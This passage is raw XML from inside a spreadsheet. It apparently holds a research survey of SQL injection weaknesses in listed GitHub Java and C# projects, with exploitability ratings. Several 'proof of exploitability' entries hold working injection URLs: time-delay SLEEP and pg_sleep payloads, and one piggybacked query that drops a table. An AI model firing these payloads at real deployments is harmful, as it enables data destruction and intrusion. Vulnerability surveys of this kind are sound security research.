      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="right" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="12" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="13" fillId="14" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="14" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="37" fillId="12" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="12" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="13" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="13" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" xfId="5" applyFont="1"/>
  </cellXfs>
  <cellStyles count="8">
    <cellStyle name="20% - Accent1" xfId="7" builtinId="30"/>
    <cellStyle name="40% - Accent1" xfId="5" builtinId="31"/>
    <cellStyle name="60% - Accent2" xfId="6" builtinId="36"/>
    <cellStyle name="Bad" xfId="3" builtinId="27"/>
    <cellStyle name="Good" xfId="2" builtinId="26"/>
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Neutral" xfId="4" builtinId="28"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="9">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Gabriel Laverghetta" id="{BCC8DD48-1317-4BD6-9F2F-653F5E1C107C}" userId="" providerI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162.65344652778" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="50" xr:uid="{9AF34B51-F17F-46F3-BD07-4AF2313F9C45}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:I51" sheet="Java"/>
  </cacheSource>
  <cacheFields count="9">
    <cacheField name="Date" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="URL" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Interface Type" numFmtId="0">
      <sharedItems count="5">
        <s v="Web"/>
        <s v="Library"/>
        <s v="Stand-alone"/>
        <s v="Build System"/>
        <s v="Client-Server"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Author Skill Level" numFmtId="0">
      <sharedItems count="3">
        <s v="Tutorial/Beginner"/>
        <s v="Other/Professional"/>
        <s v="Student"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Line Number" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="13" maxValue="677"/>
    </cacheField>
    <cacheField name="SQL Usage" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Exploitable?" numFmtId="0">
      <sharedItems count="5">
        <s v="No"/>
        <s v="Unprotected Library"/>
        <s v="Unsure"/>
        <s v="Yes"/>
        <s v="Probably"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Proof of Exploitability" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Time Spent" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" containsInteger="1" minValue="5" maxValue="12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165.700348148152" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="385" xr:uid="{19010649-93B2-4413-9C31-48D7886C5B25}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:K86" sheet="C#-Gabriel"/>
  </cacheSource>
  <cacheFields count="11">
    <cacheField name="Date Examined" numFmtId="0">
      <sharedItems containsNonDate="0" containsDate="1" containsString="0" containsBlank="1" minDate="2023-07-25T00:00:00" maxDate="2023-08-17T00:00:00"/>
    </cacheField>
    <cacheField name="URL" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Interface Type" numFmtId="0">
      <sharedItems containsBlank="1" count="7">
        <m/>
        <s v="Web app"/>
        <s v="Standalone app"/>
        <s v="Unknown"/>
        <s v="Library/Framework"/>
        <s v="Web app with server and client components"/>
        <s v="Code Snippet"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Author Skill Level" numFmtId="0">
      <sharedItems containsBlank="1" count="5">
        <m/>
        <s v="Professional"/>
        <s v="Unknown"/>
        <s v="Student"/>
        <s v="Tutorial"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Line Number" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="18" maxValue="503"/>
    </cacheField>
    <cacheField name="SQL Usage" numFmtId="0">
      <sharedItems containsBlank="1" count="24">
        <m/>
        <s v="Like"/>
        <s v="Order by"/>
        <s v="Table name"/>
        <s v="Unknown"/>
        <s v="Column name"/>
        <s v="Table and column name"/>
        <s v="Table and column names"/>
        <s v=""/>
        <s v="Table names, order by"/>
        <s v="Table and column names, order by"/>
        <s v="Select, LIKE, IN"/>
        <s v="Select, insert, update, delete, LIKE"/>
        <s v="Insert"/>
        <s v="Insert, update"/>
        <s v="Select, Order by"/>
        <s v="Select, insert, update"/>
        <s v="Select, join, group by, update, delete, convert, LIKE"/>
        <s v="Select"/>
        <s v="Select, join, insert, update, delete"/>
        <s v="Create table, insert, update"/>
        <s v="Create, drop, select from, and insert into table"/>
        <s v="Insert, select, joins"/>
        <s v="Update"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Exploitable?" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Proof of Exploitability" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="Exploitability Confidence" numFmtId="0">
      <sharedItems containsBlank="1" containsMixedTypes="1" containsNumber="1" minValue="0" maxValue="0.25"/>
    </cacheField>
    <cacheField name="Time Spent (minutes)" numFmtId="0">
      <sharedItems containsBlank="1" containsMixedTypes="1" containsNumber="1" containsInteger="1" minValue="0" maxValue="120"/>
    </cacheField>
    <cacheField name="Other Comment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m/>
    <s v="https://github.com/bearddan2000/java-cli-sbt-cockroachdb-single-node-without-ssl-data-type-json/raw/77afa0459cace21f3b6109317beda41e7097fd81/java-srv/bin/src/main/java/example/db/print/DBTablePrinter.java"/>
    <x v="0"/>
    <x v="0"/>
    <n v="133"/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/EnWaffel/random-utilities/raw/d311b6069258f81140c78b7b19a83cc0c2b4d5c5/utils/src/main/java/de/enwaffel/randomutils/sql/MySQL.java"/>
    <x v="1"/>
    <x v="1"/>
    <n v="70"/>
    <s v="Table Name, Column Name, Values"/>
    <x v="1"/>
    <s v="No mitigations (prepared statements &quot;called&quot;, not used)"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/snava10/cubanews/raw/452083fafa1f1ea67959eba3a9f0170446a584f9/crawler/src/main/java/com/snava/cubanews/data/access/SqliteMetadataDatabase.java"/>
    <x v="0"/>
    <x v="1"/>
    <n v="84"/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="30"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ctapweb/ctap-api/raw/ce5d61e96e6379eff5efa00a13bda785d956c1a4/src/main/java/com/ctapweb/api/db/operations/TextTableOperations.java"/>
    <x v="1"/>
    <x v="1"/>
    <n v="89"/>
    <s v="Order by column"/>
    <x v="1"/>
    <s v="No mitigations for the SQLIDIAs (prepared statements elsewhere)"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/hongdp/pa6_sksnf4gf1or/raw/5fa7bb8d572618f72d1d7869262183de871ffe66/hadoop-example/src/mapred/org/apache/hadoop/mapred/lib/db/DBInputFormat.java"/>
    <x v="2"/>
    <x v="2"/>
    <n v="106"/>
    <s v="Table name, order by"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/cis423-team1/gps_with_friends/raw/dd3e7e707a86c4bccbd387fe06f5f23511e48ed2/mysql-connector-java-5.1.25/src/testsuite/regression/MetaDataRegressionTest.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <m/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/luigiiorio30/symbian_linuxbuild/raw/bdefc3a2a2599a8cfc4281aaff996eeadbcdb27c/buildframework/helium/tools/common/java/src/com/nokia/fmpp/SqlDataLoader.java"/>
    <x v="3"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/greatzhb/corejava2/raw/95da5c2262c6a2472c0292bb13fd7d26943ebca2/v2ch05/view/ViewDB.java"/>
    <x v="2"/>
    <x v="2"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/LuCEresearchlab/splashe-22-expressions-java/raw/b60d3a51a5d6312de24f127434f0c676630dcd3a/expression-service/java/ch/usi/inf/luce/expr/analyzer/stats/ExprStatsTable.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table and Column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/triannisa/Categorize-Data-From-CSV-file-to-PostgreSQL/raw/0c7173b8416784ccbe97e6fec73920cf4a1a3950/csvtopostgresql/src/main/java/csvtopostgresql/DisplayData.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yangzilong1986/zhan-cms/raw/bc5a5c6e0561fd7b0e4e1557a310119e53f55041/FirestormTemp/src/zt/cms/xf/common/jdbc/XfcontractDaoImpl.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table Name and Column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/metasfresh/metasfresh/raw/f008bbbd80de973b352e94ef34ff98d635b99ed5/backend/de.metas.adempiere.adempiere/base/src/main/java/de/metas/i18n/po/POTrlRepository.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table Name and Column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="25"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/bbrand84/datamerge/raw/d90d598bf2be3c7e1068d6f56e15dafd58147f38/de.yunx.datamerge/src/main/java/de/yunx/datamerge/measures/frequency/Patstat_411_Freq_IPLytics.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/NinoMolina/metalurgica/raw/fa74c1b76121e0e69b14be41c89eb017088347bf/10_metalsoft/MetalSoft_Desktop/src/metalsoft/datos/dao/MpasignadaxpiezarealDAOImpl.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/timgdavies/backend/raw/6995d17f67f627d28a7c1a048fd12004b930e3c5/digiwhist-dataaccess/src/main/java/eu/digiwhist/dataaccess/dao/jdbc/JdbcMatchedTenderDAO.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/harshaJha18/CS636-Database-Application-Development/raw/bfab7e849261d6bc9513cd94b919ef846fb7db0d/pizza1S/src/main/java/cs636/pizza/dao/AdminDAO.java"/>
    <x v="0"/>
    <x v="2"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/martahilmar/gsn-rasip/raw/87703d9a079d2b0d4aa55649c9c99829645bd230/src/gsn/simulation/QueryGenerator.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="2"/>
    <m/>
    <n v="120"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/GeekBrainsStudent/java3/raw/7c0c7a70029cdffb62cb8f30ee9d9f1c55699f24/lesson2/src/main/java/database/QueryDB.java"/>
    <x v="2"/>
    <x v="2"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kenankd/RPR_Project/raw/0cebfd35fb4e41914f47f9518862a75212e2462c/src/main/java/ba/unsa/etf/rpr/dao/AbstractDao.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Meiyerlove/teaching/raw/d22d0c007f0d03376bc20565d15433c082372b05/src/com/cxjava/action/StudentInfoManagerDao.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Order by column"/>
    <x v="3"/>
    <s v="http://localhost:8080/teaching/FindStudentInfo?sortname=SLEEP(1000)%20--%20&amp;page=1&amp;rp=1&amp;roleid=1&amp;sortorder=1&amp;query=&amp;qtype="/>
    <n v="120"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/SpeciesDecipit/Thesis-PML-DL/raw/f11b4b30cdf034a69625db3ba6249bcc479f7049/data/code/java/negative_sample/DatabaseShardManager.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Create tables, columns"/>
    <x v="2"/>
    <m/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Eg-Krutalevich/KP/raw/4369226d4ca8ec9a490ef4d16d619493785985e7/Server/src/tables/VacancyTable.java"/>
    <x v="4"/>
    <x v="0"/>
    <n v="13"/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/BETAJIb/ikol/raw/f3709ea10be2d155b0bf1dee487f53c723f570cf/L2J_Mobius_7.0_PreludeOfWar/java/org/l2jmobius/tools/dbinstaller/util/mysql/DBDumper.java"/>
    <x v="1"/>
    <x v="1"/>
    <m/>
    <s v="Table name/column names"/>
    <x v="0"/>
    <s v="Dynamically verified"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/myfosse/University-6_sem_sake_tasks_1_6/raw/5a981321526107092ad4101a54af4f40e2bd4a2e/src/main/java/dao/sql/DatabaseHandler.java"/>
    <x v="4"/>
    <x v="2"/>
    <n v="44"/>
    <s v="Table, column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kosmas1991/MusicDB/raw/798e11fb5f5210a6541ae96278a31c5865058478/src/model/DataSource.java"/>
    <x v="2"/>
    <x v="0"/>
    <n v="50"/>
    <s v="Table and Column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/EntropyTeam/entropy-pf/raw/8d0e08641e1a40f87ad2e77a08a87daa8c45ea53/producto/trunk/Entropy_Profesor/src/backend/dao/dise%C3%B1os/DAOInstitucion.java"/>
    <x v="2"/>
    <x v="1"/>
    <n v="27"/>
    <s v="Table and Column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Biblivre/Biblivre-5/raw/f7d3bf44d4c7bb555d4e83c17df6cdf25b4a4e90/src/java/biblivre/administration/indexing/IndexingGroupsDAO.java"/>
    <x v="0"/>
    <x v="1"/>
    <n v="45"/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="20"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/URMC/i2b2/raw/29f26382db8419a95a1119fc665a3c3f6c404765/server/edu.harvard.i2b2.crc/src/server/edu/harvard/i2b2/crc/dao/pdo/PageTotalDao.java"/>
    <x v="4"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="15"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/curtiszimmerman/TellFinder/raw/5fa920ca5b24f8ca87e35400eeccf55fda75aa7e/src/oculus/memex/rest/ServerResource.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Atreus1125/PlantMore/raw/db5b4cb74a6e33f80d94d0f287d3db222a75536d/src/shop/dao/impl/GoodsDAOImpl.java"/>
    <x v="0"/>
    <x v="1"/>
    <n v="139"/>
    <s v="Table"/>
    <x v="3"/>
    <s v="http://localhost:8080/pages/front/goods/GoodsServletFront/list?col=SLEEP(1000)%20OR%20?%20=%20?%20OR%20?%20=%20?%20--"/>
    <n v="100"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/cgc-carbon/CGC_ERP/raw/a2ac0f6c25a9bda04a0933c980948f13b8814017/src/java/com/cgc/DB/D_product_receive_track_detailDAO.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table, column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/firedevelop/Programming/raw/920f88348633affc5892b60f8b83c74fafb9ada7/Java/TimBuchalka/Java_MasterClass_0262_020/src/com/timbuchalka/model/Datasource.java"/>
    <x v="2"/>
    <x v="2"/>
    <m/>
    <s v="Table, column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/phenoscape/phenoscape-nlp/raw/6522bcd2d15ada4c904ff4601a12ece16840c64a/parsing-gui/src/fna/db/HabitatParserDbAccessor.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table, column, order by"/>
    <x v="0"/>
    <s v="Dead code"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/xfifix/SEO_REPO/raw/2dbb840b03e85c98f1339f60967670dcbc71aacf/SIMILARITY_METRICS/src/vsm/InsideMagasinSimilarityWorkerThread.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Column"/>
    <x v="0"/>
    <s v="Config File"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/liuhuiAndroid/tcc-transaction-master-1.2.x/raw/6bc383e4121325861bae56840348ac2fa4187759/tcc-transaction-core/src/main/java/org/mengyun/tcctransaction/repository/JdbcTransactionRepository.java"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <s v="Table Prefix"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/victorst79/DAW-Java-Works/raw/a28a55daad7593305024f04f5b52e3185d9b958d/Agenda/src/AgendaBD.java"/>
    <x v="2"/>
    <x v="0"/>
    <m/>
    <s v="Table Name"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gy0531/jsprun/raw/b350aab4296d3b18fda61528ba861ce03d61b7c3/src/cn/jsprun/service/AdvSetService.java"/>
    <x v="0"/>
    <x v="1"/>
    <n v="228"/>
    <s v="Order by column"/>
    <x v="3"/>
    <s v="http://localhost:8080/jsprun/other.do?action=adv&amp;orderby=SLEEP(1000)"/>
    <n v="120"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/vitorwolski/security-updates/raw/a326890b26eb2ee7fa1796972b3fe33444b59044/lib/quartz-2.3.0/src/org/quartz/impl/jdbcjobstore/SimplePropertiesTriggerPersistenceDelegateSupport.java"/>
    <x v="4"/>
    <x v="1"/>
    <m/>
    <s v="Table, column, order by"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/barrycom/kgmx/raw/f2ad7902d06d36fdb908c6c098f36c978907b05f/src/com/jetcms/cms/dao/assist/impl/CmsSqlserverDataBackDaoImpl.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="4"/>
    <m/>
    <n v="120"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/svn2github/s2container/raw/625adc6c4e1396654a7297d00ec206c077a78696/tags/2009-05-19/seasar2-2.4.37/s2jdbc-gen/s2jdbc-gen/src/main/java/org/seasar/extension/jdbc/gen/internal/version/SchemaInfoTableImpl.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table, column, order by"/>
    <x v="2"/>
    <m/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/a2531509/eracloud_jx/raw/c2b4ff07e4ba6d4f4c09e56454720e2003df038d/src/com/erp/util/CreateBean.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="10"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/maximilianocorrea/libertya/raw/780a87ef4a76e6c36cd64ee07466e52ca1921b1d/FreeQueryBuilder/nickyb/fqb/nickyb/fqb/DialogCount.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="4"/>
    <s v="Appears to be a graphical DB tool, so takes tablename directly from user (the user presumably owns the DB though...)"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Biplon/PlayertoSQL/raw/8123e8efe368747ff0f7a4f51d66ec288ef8e712/src/pts/java/database/DatabaseManager.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/evgenymalishevskiy/JD2018-11-13-000/raw/4c7673a49f065a87e57e3125b378f382440a4163/src/by/it/naumenko/jd03_03/MyDAO.java"/>
    <x v="2"/>
    <x v="2"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/SumeetMoray/Nearby-Shops-API-Deprecated/raw/ce04e4ced3bb8d40805fcff053b3cd6b125e8737/api/src/main/java/org/nearbyshops/DAOsPreparedRoles/EndUserDAONew.java"/>
    <x v="0"/>
    <x v="1"/>
    <n v="677"/>
    <s v="Order by column"/>
    <x v="3"/>
    <s v="http://localhost:5000/api/v1/EndUser?SortBy=1;%20SELECT%20pg_sleep(20)%20--%20&amp;Limit=10&amp;Offset=0"/>
    <n v="45"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/LukaOrlovic/TicTacToe/raw/bed0b300a81e286971ab44348c66b2067772a0d1/TicTacToeServerApplication/src/brokerBazePodataka/BrokerBazePodataka1.java"/>
    <x v="2"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Morphage/jSCAPE/raw/2d2817be3d5f5ddaea17a3e449303ef39c66a729/jSCAPE%20AdminTool/src/jscape/database/StudentTable.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Table"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/YQmomo/supervise/raw/8fc9205cb803164533a373585abf7b1b92e74e19/gov.df.fap/gov.df.fap.service/src/main/java/gov/df/fap/service/portal/impl/IPaginationServiceImpl.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Order by column"/>
    <x v="4"/>
    <m/>
    <n v="120"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Java-Camp/Back-end/raw/533874b537f805716dfe83f9b72306c4cda8dd7b/src/main/java/com/jcf/orm/sql/EntityDAO.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Order by column"/>
    <x v="0"/>
    <s v="Hardcoded"/>
    <n v="5"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Nwanda/jforum/raw/4d883758e039ae388375d72901a0b2802f90217e/src/net/jforum/dao/generic/GenericKarmaDAO.java"/>
    <x v="0"/>
    <x v="1"/>
    <m/>
    <s v="Order by column"/>
    <x v="0"/>
    <s v="Dead code"/>
    <n v="8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5">
  <r>
    <m/>
    <s v="https://github.com/satishsoftqubes/symphony/raw/88e6da41c5ab6228504a45fbe79212ba5942b941/UI/Web/IRMS/SQT.Symphony.UI.Web.Configuration/GUI/PriceManager/RateCardAutoComplete.ashx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/numandokrul/e-Commerce-NumanStore/raw/3088e6a8f504e1348171f2f0b0120f7cd6af3545/e-Commerce-NumanStore.eCommerce/App_Code/UrunCRUD.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="111"/>
    <x v="1"/>
    <s v="SQL-IA"/>
    <s v="Download and build the web app. Set up the database with the urunler and TblSepet tables. Navigate to the following page: localhost:{port app is running on}/urunler.aspx?kat=%'; DROP TABLE TblSepet;--"/>
    <s v="100_x000a_%"/>
    <n v="90"/>
    <s v="Piggybacked query using unsanitized query string"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tracyacai/sharpmap/raw/751bb02054c3e4d945a6d24dad025dcd9ca7a1e4/SharpMap/Data/Providers/MsSql.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/gracianani/SINO_CRM/raw/8afb9493049c1b59fdcd9e0c06c6da1a590d1161/SiemensCRM/Admin/AdminLockSystem.aspx.cs"/>
    <x v="0"/>
